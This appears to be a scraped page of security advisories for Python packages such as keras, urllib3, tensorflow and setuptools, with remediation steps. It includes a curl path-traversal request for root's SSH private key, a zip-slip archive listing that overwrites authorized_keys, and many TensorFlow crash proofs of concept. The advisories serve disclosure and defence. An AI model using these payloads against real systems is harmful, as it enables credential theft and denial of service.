Find, fix and prevent vulnerabilities in your code.

Overview

keras is a Keras is a high-level neural networks API for Python..

Affected versions of this package are vulnerable to Directory Traversal via the keras.utils.get_file API when the extract=True option is used for tar archives. An attacker can write arbitrary files to any location on the filesystem outside of the intended destination folder by supplying a crafted tar archive containing special symlinks.

Note:

This vulnerability is linked to the underlying Python tarfile weakness, identified as CVE-2025-4517. Note that upgrading Python to one of the versions that fix CVE-2025-4517 (e.g. Python 3.13.4) is not enough. One additionally needs to upgrade Keras to a version with the fix (Keras 3.12.0).

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

• Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

• Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade keras to version 3.12.0 or higher.

References

• GitHub Commit
• GitHub PR

Overview

urllib3 is a HTTP library with thread-safe connection pooling, file post, and more.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling during the decompression of compressed response data. An attacker can cause excessive CPU and memory consumption by sending responses with a large number of chained compression steps.

Workaround

This vulnerability can be avoided by setting preload_content=False and ensuring that resp.headers["content-encoding"] are limited to a safe quantity before reading.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

• High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

• Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade urllib3 to version 2.6.0 or higher.

References

• GitHub Commit

Overview

urllib3 is a HTTP library with thread-safe connection pooling, file post, and more.

Affected versions of this package are vulnerable to Improper Handling of Highly Compressed Data (Data Amplification) in the Streaming API. The ContentDecoder class can be forced to allocate disproportionate resources when processing a single chunk with very high compression, such as via the stream(), read(amt=256), read1(amt=256), read_chunked(amt=256), and readinto(b) functions.

Note: It is recommended to patch Brotli dependencies (upgrade to at least 1.2.0) if they are installed outside of urllib3 as well, to avoid other instances of the same vulnerability.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

• High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

• Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade urllib3 to version 2.6.0 or higher.

References

• GitHub Commit

Overview

urllib3 is a HTTP library with thread-safe connection pooling, file post, and more.

Affected versions of this package are vulnerable to Improper Handling of Highly Compressed Data (Data Amplification) via the streaming API when handling HTTP redirects. An attacker can cause excessive resource consumption by serving a specially crafted compressed response that triggers decompression of large amounts of data before any read limits are enforced.

Note: This is only exploitable if content is streamed from untrusted sources with redirects enabled.

Workaround

This vulnerability can be mitigated by disabling redirects by setting redirect=False for requests to untrusted sources.

Remediation

Upgrade urllib3 to version 2.6.3 or higher.

References

• GitHub Commit

Overview

protobuf is a Google’s data interchange format

Affected versions of this package are vulnerable to Uncontrolled Recursion when parsing untrusted Protocol Buffers data containing an excessive number of recursive groups, recursive messages, or a series of SGROUP tags. An attacker can provide crafted input that will corrupt the backend by exceeding the Python recursion limit and result in denial of service by crashing the application with a RecursionError.

Note: This problem impacts only the pure-Python implementation of the protobuf-python backend and does not influence the CPython PyPi wheels, which, by default, do not utilize pure Python.

Remediation

Upgrade protobuf to version 4.25.8, 5.29.5, 6.31.1 or higher.

References

• GitHub Commit
• GitHub Commit
• GitHub Commit
• PoC Code

Overview

tensorflow is a machine learning framework.

Affected versions of this package are vulnerable to Integer Overflow or Wraparound due to the array_ops.upper_bound function. An attacker can cause a denial of service by providing input that is not a rank 2 tensor.

Remediation

Upgrade tensorflow to version 2.12.0 or higher.

References

• GitHub Commit
• GitHub Commit

Overview

keras is a Keras is a high-level neural networks API for Python..

Affected versions of this package are vulnerable to Deserialization of Untrusted Data via the function saving_lib.load_model, which identifies the model source (file, directory, or Hugging Face repository) and then calls the corresponding loader. An attacker can execute arbitrary code by convincing a user to load a specially crafted .keras model archive.

Details

Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.

Deserialization of untrusted data (CWE-502) is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, thus allowing the attacker to control the state or the flow of the execution.

Remediation

Upgrade keras to version 3.11.0 or higher.

References

• GitHub Commit
• GitHub PR

Overview

keras is a Keras is a high-level neural networks API for Python..

Affected versions of this package are vulnerable to Deserialization of Untrusted Data via the Model.load_model method. An attacker can execute arbitrary code by providing a specially crafted .keras model archive containing a config.json file that invokes keras.config.enable_unsafe_deserialization() to disable safe mode, followed by a Lambda layer with malicious pickled code.

Details

Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.

Deserialization of untrusted data (CWE-502) is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, thus allowing the attacker to control the state or the flow of the execution.

Remediation

Upgrade keras to version 3.11.0 or higher.

References

• GitHub Commit
• GitHub PR

Overview

keras is a Keras is a high-level neural networks API for Python..

Affected versions of this package are vulnerable to Deserialization of Untrusted Data in the load_model() function, which uses pickle for serialization. An attacker can execute code even if safe_mode is set to True, by supplying a malicious .keras file. The included config.json can be manipulated to point to and load npz model files containing executable code.

Details

Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.

Deserialization of untrusted data (CWE-502) is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, thus allowing the attacker to control the state or the flow of the execution.

Remediation

Upgrade keras to version 3.9.0 or higher.

References

• GitHub Commit
• GitHub Commit
• GitHub PR
• Exploit DB
• Nuclei Templates

Overview

tensorflow is a machine learning framework.

Affected versions of this package are vulnerable to Double Free. The nn_ops.fractional_avg_pool_v2 and nn_ops.fractional_max_pool_v2 functions require the first and fourth elements of their parameter pooling_ratio to be equal to 1.0, as pooling on batch and channel dimensions is not supported.

PoC

import tensorflow as tf
import os
import numpy as np
from tensorflow.python.ops import nn_ops
try:
  arg_0_tensor = tf.random.uniform([3, 30, 50, 3], dtype=tf.float64)
  arg_0 = tf.identity(arg_0_tensor)
  arg_1_0 = 2
  arg_1_1 = 3
  arg_1_2 = 1
  arg_1_3 = 1
  arg_1 = [arg_1_0,arg_1_1,arg_1_2,arg_1_3,]
  arg_2 = True
  arg_3 = True
  seed = 341261001
  out = nn_ops.fractional_avg_pool_v2(arg_0,arg_1,arg_2,arg_3,seed=seed,)
except Exception as e:
  print("Error:"+str(e))

Remediation

Upgrade tensorflow to version 2.11.1, 2.12.0 or higher.

References

• GitHub Commit

Overview

Affected versions of this package are vulnerable to Improper Control of Generation of Code ('Code Injection') through the package_index module's download functions due to the unsafe usage of os.system. An attacker can execute arbitrary commands on the system by providing malicious URLs or manipulating the URLs retrieved from package index servers.

Note

Because easy_install and package_index are deprecated, the exploitation surface is reduced, but it's conceivable through social engineering or minor compromise to a package index could grant remote access.

Remediation

Upgrade setuptools to version 70.0.0 or higher.

References

• GitHub Commit
• GitHub Issue
• GitHub PR
• PoC

Overview

tensorflow is a machine learning framework.

Affected versions of this package are vulnerable to Buffer Overflow in TAvgPoolGrad.

PoC

import os
os.environ['TF_ENABLE_ONEDNN_OPTS'] = '0'
import tensorflow as tf
print(tf.__version__)
with tf.device("CPU"):
    ksize = [1, 40, 128, 1]
    strides = [1, 128, 128, 30]
    padding = "SAME"
    data_format = "NHWC"
    orig_input_shape = [11, 9, 78, 9]
    grad = tf.saturate_cast(tf.random.uniform([16, 16, 16, 16], minval=-128, maxval=129, dtype=tf.int64), dtype=tf.float32)
    res = tf.raw_ops.AvgPoolGrad(
        ksize=ksize,
        strides=strides,
        padding=padding,
        data_format=data_format,
        orig_input_shape=orig_input_shape,
        grad=grad,
    )

Remediation

Upgrade tensorflow to version 2.11.1, 2.12.0 or higher.

References

• GitHub Commit

Overview

tensorflow is a machine learning framework.

Affected versions of this package are vulnerable to Denial of Service (DoS) due to a floating point exception in AudioSpectrogram.

PoC

import tensorflow as tf

para = {'input': tf.constant([[14.], [24.]], dtype=tf.float32), 'window_size': 1, 'stride': 0, 'magnitude_squared': False}
func = tf.raw_ops.AudioSpectrogram

@tf.function(jit_compile=True)
def fuzz_jit():
   y = func(**para)
   return y

fuzz_jit()

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

• High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

• Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade tensorflow to version 2.11.1, 2.12.0 or higher.

References

• GitHub Commit

Overview

tensorflow is a machine learning framework.

Affected versions of this package are vulnerable to Denial of Service (DoS). When the parameter summarize of tf.raw_ops.Print is zero, the new method SummarizeArray<bool> will reference to a nullptr, leading to a seg fault.

PoC

import tensorflow as tf

tf.raw_ops.Print(input =  tf.constant([1, 1, 1, 1],dtype=tf.int32),
                            data =  [[False, False, False, False], [False], [False, False, False]],
                            message =  'tmp/I',
                            first_n = 100,
                            summarize = 0)

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

• High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

• Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade tensorflow to version 2.11.1, 2.12.0 or higher.

References

• GitHub Commit

Overview

tensorflow is a machine learning framework.

Affected versions of this package are vulnerable to Denial of Service (DoS) due to a floating point exception if the stride and window size are not positive for tf.raw_ops.AvgPoolGrad.

PoC

import tensorflow as tf
import numpy as np

@tf.function(jit_compile=True)
def test():
   y = tf.raw_ops.AvgPoolGrad(orig_input_shape=[1,0,0,0], grad=[[[[0.39117979]]]], ksize=[1,0,0,0], strides=[1,0,0,0], padding="SAME", data_format="NCHW")
   return y

print(test())

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

• High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

• Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade tensorflow to version 2.11.1, 2.12.0 or higher.

References

• GitHub Commit

Overview

tensorflow is a machine learning framework.

Affected versions of this package are vulnerable to Denial of Service (DoS). When running with XLA, tf.raw_ops.Bincount segfaults when given a parameter weights that is neither the same shape as parameter arr nor a length-0 tensor.

PoC

import tensorflow as tf

func = tf.raw_ops.Bincount
para={'arr': 6, 'size': 804, 'weights': [52, 351]}

@tf.function(jit_compile=True)
def fuzz_jit():
 y = func(**para)
 return y

print(fuzz_jit())

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

• High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

• Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade tensorflow to version 2.11.1, 2.12.0 or higher.

References

• GitHub Commit

Overview

tensorflow is a machine learning framework.

Affected versions of this package are vulnerable to Denial of Service (DoS) due to a floating point exception in TensorListSplit with XLA.

PoC

import tensorflow as tf

func = tf.raw_ops.TensorListSplit
para = {'tensor': [1], 'element_shape': -1, 'lengths': [0]}

@tf.function(jit_compile=True)
def fuzz_jit():
 y = func(**para)
 return y

print(fuzz_jit())

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

• High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

• Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade tensorflow to version 2.11.1, 2.12.0 or higher.

References

• GitHub Commit

Overview

tensorflow is a machine learning framework.

Affected versions of this package are vulnerable to Denial of Service (DoS) when running with XLA, tf.raw_ops.ParallelConcat segfaults with a nullptr dereference when given a parameter shape with rank that is not greater than zero.

PoC

import tensorflow as tf

func = tf.raw_ops.ParallelConcat
para = {'shape':  0, 'values': [1]}

@tf.function(jit_compile=True)
def test():
   y = func(**para)
   return y

test()

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

• High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

• Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade tensorflow to version 2.11.1, 2.12.0 or higher.

References

• GitHub Commit

Overview

tensorflow is a machine learning framework.

Affected versions of this package are vulnerable to Heap-based Buffer Overflow. Attackers can access heap memory which is not in the control of user, leading to a crash or remote code execution. The fix will be included in TensorFlow version 2.12.0 and will also cherrypick this commit on TensorFlow version 2.11.1.

PoC

import tensorflow as tf
@tf.function
def test():
    tf.raw_ops.QuantizeAndDequantizeV2(input=[2.5],
                                       input_min=[1.0],
                                       input_max=[10.0],
                                       signed_input=True,
                                       num_bits=1,
                                       range_given=True,
                                       round_mode='HALF_TO_EVEN',
                                       narrow_range=True,
                                       axis=0x7fffffff)
test()

Remediation

Upgrade tensorflow to version 2.11.1, 2.12.0 or higher.

References

• GitHub Commit

Overview

tensorflow is a machine learning framework.

Affected versions of this package are vulnerable to Incorrect Comparison. Constructing a tflite model with a paramater filter_input_channel of less than 1 gives a float pointer exception.

Remediation

Upgrade tensorflow to version 2.11.1, 2.12.0 or higher.

References

• GitHub Commit

Overview

tensorflow is a machine learning framework.

Affected versions of this package are vulnerable to Integer Overflow to Buffer Overflow when 2^31 <= num_frames * height * width * channels < 2^32, for example Full HD screencast of at least 346 frames.

PoC

import urllib.request
dat = urllib.request.urlopen('https://raw.githubusercontent.com/tensorflow/tensorflow/1c38ad9b78ffe06076745a1ee00cec42f39ff726/tensorflow/core/lib/gif/testdata/3g_multiframe.gif').read()
import tensorflow as tf
tf.io.decode_gif(dat)

Remediation

Upgrade tensorflow to version 2.11.1, 2.12.0 or higher.

References

• GitHub Commit

Overview

tensorflow is a machine learning framework.

Affected versions of this package are vulnerable to NULL Pointer Dereference when SparseSparseMaximum is given invalid sparse tensors as inputs.

PoC

import tensorflow as tf
tf.raw_ops.SparseSparseMaximum(
 a_indices=[[1]],
 a_values =[ 0.1 ],
 a_shape = [2],
 b_indices=[[]],
 b_values =[2 ],
 b_shape = [2],
)

Remediation

Upgrade tensorflow to version 2.11.1, 2.12.0 or higher.

References

• GitHub Commit

Overview

tensorflow is a machine learning framework.

Affected versions of this package are vulnerable to NULL Pointer Dereference. When ctx->step_containter() is a null ptr, the Lookup function will be executed with a null pointer.

PoC

import tensorflow as tf
tf.raw_ops.TensorArrayConcatV2(handle=['a', 'b'], flow_in = 0.1, dtype=tf.int32, element_shape_except0=1)

Remediation

Upgrade tensorflow to version 2.11.1, 2.12.0 or higher.

References

• GitHub Commit

Overview

tensorflow is a machine learning framework.

Affected versions of this package are vulnerable to NULL Pointer Dereference. The function tf.raw_ops.LookupTableImportV2 cannot handle scalars in the values parameter and gives a null pointer exception.

PoC

import tensorflow as tf

v = tf.Variable(1)

@tf.function(jit_compile=True)
def test():
   func = tf.raw_ops.LookupTableImportV2
   para={'table_handle': v.handle,'keys': [62.98910140991211, 94.36528015136719], 'values': -919}

   y = func(**para)
   return y

print(test())

Remediation

Upgrade tensorflow to version 2.11.1, 2.12.0 or higher.

References

• GitHub Commit

Overview

tensorflow is a machine learning framework.

Affected versions of this package are vulnerable to NULL Pointer Dereference due to a null pointer error in RandomShuffle with XLA enabled.

PoC

import tensorflow as tf

func = tf.raw_ops.RandomShuffle
para = {'value': 1e+20, 'seed': -4294967297, 'seed2': -2147483649}

@tf.function(jit_compile=True)
def test():
   y = func(**para)
   return y

test()

Remediation

Upgrade tensorflow to version 2.11.1, 2.12.0 or higher.

References

• GitHub Commit

Overview

tensorflow is a machine learning framework.

Affected versions of this package are vulnerable to Out-of-Bounds due to mismatched integer type sizes in ValueMap::Manager::GetValueOrCreatePlaceholder, because there is a bug with the tfg-translate call to InitMlir.

Remediation

Upgrade tensorflow to version 2.11.1, 2.12.0 or higher.

References

• GitHub Commit
• GitHub Commit

Overview

tensorflow is a machine learning framework.

Affected versions of this package are vulnerable to Out-of-bounds Read in GRUBlockCellGrad.

PoC

func = tf.raw_ops.GRUBlockCellGrad

para = {'x': [[21.1, 156.2], [83.3, 115.4]], 'h_prev': array([[136.5],
      [136.6]]), 'w_ru': array([[26.7,  0.8],
      [47.9, 26.1],
      [26.2, 26.3]]), 'w_c': array([[ 0.4],
      [31.5],
      [ 0.6]]), 'b_ru': array([0.1, 0.2 ], dtype=float32), 'b_c': 0x41414141, 'r': array([[0.3],
      [0.4]], dtype=float32), 'u': array([[5.7],
      [5.8]]), 'c': array([[52.9],
      [53.1]]), 'd_h': array([[172.2],
      [188.3 ]])}

Remediation

Upgrade tensorflow to version 2.11.1, 2.12.0 or higher.

References

• GitHub Commit

Overview

tensorflow is a machine learning framework.

Affected versions of this package are vulnerable to Out-of-bounds Read if the parameter indices for DynamicStitch does not match the shape of the parameter data.

PoC

import tensorflow as tf
func = tf.raw_ops.DynamicStitch
para={'indices': [[0xdeadbeef], [405], [519], [758], [1015]], 'data': [[110.27793884277344], [120.29475402832031], [157.2418212890625], [157.2626953125], [188.45382690429688]]}
y = func(**para)

Remediation

Upgrade tensorflow to version 2.11.1, 2.12.0 or higher.

References

• GitHub Commit

Overview

Affected versions of this package are vulnerable to Remote Code Execution (RCE) due to insufficient hostname checks and the use of relative paths to resolve requests. When the debugger is enabled, an attacker can convince a user to enter their own PIN to interact with a domain and subdomain they control, and thereby cause malicious code to be executed.

The demonstrated attack vector requires a number of conditions that render this attack very difficult to achieve, especially if the victim application is running in the recommended configuration of not having the debugger enabled in production.

Remediation

Upgrade werkzeug to version 3.0.3 or higher.

References

• GitHub Commit
• GitHub Release

Overview

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via attacker-controlled input to Wheel CLI, when parsing a maliciously crafted Wheel file.

Note:Version 0.38.0 has been yanked due to an unrelated non-security issue. Users are advised to upgrade to version 0.38.1.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

• A The string must start with the letter 'A'
• (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
• D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

1. CCC
2. CC+C
3. C+CC
4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade wheel to version 0.38.0 or higher.

References

• GitHub Commit
• GitHub Commit
• GitHub Release
• Pyup Blog
• Vulnerable Code

Overview

keras is a Keras is a high-level neural networks API for Python..

Affected versions of this package are vulnerable to Improper Control of Dynamically-Managed Code Resources via the Model.load_model method. An attacker can execute arbitrary code by providing a specially crafted .h5 or .hdf5 model archive that leverages the Lambda layer feature to include pickled Python code, which is executed when the archive is loaded, even if safe_mode=True is set.

Remediation

Upgrade keras to version 3.11.3 or higher.

References

• GitHub Commit
• GitHub PR

Overview

tensorflow is a machine learning framework.

Affected versions of this package are vulnerable to Integer Overflow or Wraparound in EditDistance. A fix is included in TensorFlow version 2.12.0 and version 2.11.1.

PoC

import tensorflow as tf
para={
    'hypothesis_indices': [[]],
    'hypothesis_values': ['tmp/'],
    'hypothesis_shape': [],
    'truth_indices': [[]],
    'truth_values': [''],
    'truth_shape': [],
    'normalize': False
    }
tf.raw_ops.EditDistance(**para)

Remediation

Upgrade tensorflow to version 2.11.1, 2.12.0 or higher.

References

• GitHub Commit

Overview

keras is a Keras is a high-level neural networks API for Python..

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in HDF5 dataset metadata validation. An attacker can cause excessive memory consumption and crash the Python interpreter by supplying a crafted .keras archive containing a model.weights.h5 file with a dataset that declares an extremely large shape.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

• High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

• Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

A fix was pushed into the master branch but not yet published.

References

• GitHub Commit
• GitHub PR